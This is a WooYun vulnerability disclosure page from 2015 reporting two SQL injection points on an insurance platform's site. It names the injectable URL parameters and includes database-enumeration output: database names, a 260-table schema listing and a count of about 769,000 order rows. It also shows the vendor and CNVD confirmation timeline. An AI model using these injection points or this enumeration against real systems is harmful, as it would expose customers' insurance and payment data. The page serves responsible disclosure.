当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160011

漏洞标题:立刻保主站两处sql漏洞(数十万保险订单信息泄露)

相关厂商:立刻保

漏洞作者: 路人甲

提交时间:2015-12-10 17:37

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

立刻保主站两处sql漏洞(数十万保险订单信息泄露)

详细说明:

http://**.**.**.**/cpk/search/productdetail/?&product_no=2671
http://**.**.**.**/cpk/search/?action=search¶m_no=411,461,891,951&age=0,3&agefilter=age
available databases [4]:
[*] information_schema
[*] LIKE18
[*] LIKE18S
[*] test

漏洞证明:

Database: LIKE18                                                                                                       
[260 tables]
+--------------------------------------+
| character                            |
| order                                |
| user                                 |
| account                              |
| account_detail                       |
| account_maintenance                  |
| account_trade_logs                   |
| accounting_receivable                |
| actually_receive                     |
| advertising_category                 |
| advertising_detail                   |
| advertising_detail_logs              |
| agency_agreement                     |
| agent                                |
| archivements_report                  |
| auto_policy_logs                     |
| b2b_air_batch                        |
| b2b_air_detail                       |
| b2b_car_info                         |
| backup_auto_policy_logs              |
| backup_order                         |
| backup_order_commission_batch        |
| backup_order_commission_receivable   |
| backup_order_commission_receive      |
| backup_order_customer                |
| backup_order_detail                  |
| backup_order_final_payment           |
| backup_order_final_transfer          |
| backup_order_last_status             |
| backup_order_payment_batch           |
| backup_order_payment_receivable      |
| backup_order_payment_receive         |
| backup_order_product_batch           |
| backup_order_should_transfer         |
| backup_order_status_logs             |
| backup_order_suspense_credits        |
| backup_order_transfer_batch          |
| bonus                                |
| bonus_type                           |
| cache_advertising_costs_statistics   |
| cache_insurance_day_statistics       |
| cache_insurance_month_statistics     |
| cache_insurance_week_statistics      |
| cache_operating_trends_statistics    |
| cache_ping_trip_insurance_statistics |
| cache_traffic_trends_statistics      |
| cache_vehicle_insurance_statistics   |
| car_discount                         |
| car_discount_property                |
| car_info                             |
| car_info_bj                          |
| car_info_hz                          |
| card_result                          |
| category                             |
| character_number                     |
| city                                 |
| cm_product                           |
| cm_product_property                  |
| cm_product_property_detail           |
| cm_product_property_top              |
| cm_product_type                      |
| company                              |
| company_category                     |
| counter_log                          |
| coupons                              |
| coupons_events                       |
| coupons_number                       |
| cpk_category                         |
| cpk_policy                           |
| cpk_product                          |
| cpk_product_category_tags            |
| cpk_product_price_property           |
| cpk_product_property                 |
| cpk_property                         |
| cpk_tags                             |
| domain2ip                            |
| easybuy                              |
| emails_lib                           |
| emails_logs                          |
| emails_transmit_lib                  |
| emails_transmit_stat                 |
| fastins_info                         |
| feedback                             |
| feedback_call                        |
| feedback_order                       |
| feedback_order_detail                |
| feedback_order_spec_life             |
| feedback_phone                       |
| feedback_statistics                  |
| freight_rate                         |
| groups                               |
| groups_rights                        |
| insurance_category                   |
| insurance_detail                     |
| insurance_documents                  |
| insurance_policy_send                |
| insured_member                       |
| job_category                         |
| job_category_company                 |
| line_commission                      |
| logs                                 |
| mail_rebuy                           |
| mail_rebuy_detail                    |
| member                               |
| member_account                       |
| member_account_month_data            |
| member_apply_cash                    |
| member_bank_info                     |
| member_commission                    |
| member_group                         |
| member_to_user                       |
| order_commission_batch               |
| order_commission_receivable          |
| order_commission_receive             |
| order_customer                       |
| order_detail                         |
| order_final_payment                  |
| order_final_transfer                 |
| order_insurance_documents            |
| order_last_status                    |
| order_long_commission                |
| order_payment_batch                  |
| order_payment_excessive              |
| order_payment_platform               |
| order_payment_platform_detail        |
| order_payment_receivable             |
| order_payment_receive                |
| order_product_batch                  |
| order_refundment                     |
| order_reinsure                       |
| order_reinsure_status                |
| order_should_transfer                |
| order_spec_accident                  |
| order_spec_bike                      |
| order_spec_carbody                   |
| order_spec_corpaccident              |
| order_spec_corphome                  |
| order_spec_corporation               |
| order_spec_duty                      |
| order_spec_freight                   |
| order_spec_house                     |
| order_spec_moto                      |
| order_spec_traffic                   |
| order_spec_travel                    |
| order_status                         |
| order_status_degrees                 |
| order_status_logs                    |
| order_status_property                |
| order_suspense_credits               |
| order_suspense_credits_prepaid       |
| order_temporary_fee                  |
| order_transfer_batch                 |
| page                                 |
| page_body                            |
| page_body_history                    |
| page_code                            |
| partners                             |
| permit_ips                           |
| personnel                            |
| phone                                |
| phone_logs                           |
| pingan_elasticity_tmp                |
| piwik_report                         |
| policy_confirm_info                  |
| product                              |
| product_commission                   |
| product_commission_assign            |
| product_commission_doc               |
| product_price                        |
| product_property                     |
| product_set                          |
| promotions                           |
| pt_cash_apply                        |
| pt_content                           |
| pt_order_detail                      |
| recom_content                        |
| recom_convert_log                    |
| recom_pay_log                        |
| recom_product                        |
| recom_product_log                    |
| recommend                            |
| region                               |
| resourcesallocation                  |
| resourcesallocation_logs             |
| safe_track                           |
| sales_group                          |
| sales_user_account                   |
| sales_user_bonus_apply               |
| sales_user_bonus_detail              |
| sales_user_bonus_detail_prev         |
| sales_user_bonus_property            |
| sales_user_group                     |
| sales_user_product_bonus             |
| search_keyword                       |
| service_order                        |
| service_order_customer               |
| service_order_detail                 |
| service_order_feedback               |
| service_order_last_status            |
| service_order_quote_company          |
| service_order_quote_price            |
| service_order_spec_carbody           |
| service_order_status                 |
| service_order_status_detail_logs     |
| service_order_status_logs            |
| service_order_status_property        |
| shop                                 |
| shop_series                          |
| shop_series_product                  |
| site_config                          |
| staffing                             |
| syslogs                              |
| tmp_commission                       |
| user_group_set                       |
| user_groups                          |
| user_groups_logs                     |
| user_profile                         |
| user_recommand_type                  |
| view_allocations                     |
| view_categorytree                    |
| view_commission                      |
| view_commission_tmp                  |
| view_flow_admin                      |
| view_flow_commission                 |
| view_flow_doc                        |
| view_flow_fee                        |
| view_flow_finish                     |
| view_flow_payment                    |
| view_flow_refundment                 |
| view_flow_service                    |
| view_flow_transfer                   |
| view_groups_page                     |
| view_member_commission               |
| view_order                           |
| view_order_detail                    |
| view_order_normal                    |
| view_page_search                     |
| view_payment_fare                    |
| view_phone_select                    |
| view_refundment                      |
| view_service_order                   |
| view_service_status_logs             |
| view_status_logs                     |
| view_status_property                 |
| view_suspense_credits                |
| view_transfer                        |
| view_user_groups                     |
| view_user_page_code                  |
| view_user_sales_group                |
| web_account                          |
| web_account_detail                   |
| workgroup                            |
| workgrouptypes                       |
| yingshou_allocate_source             |
| yingshou_discount                    |
| yingshou_distribution                |
| yingshou_revenue_category            |
| yingshou_revenue_category_details    |
| zj_fate                              |
| zj_fate_detail                       |
+--------------------------------------+


Database: LIKE18
+------------+---------+
| Table      | Entries |
+------------+---------+
| view_order | 769191  |
+------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-14 17:29

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无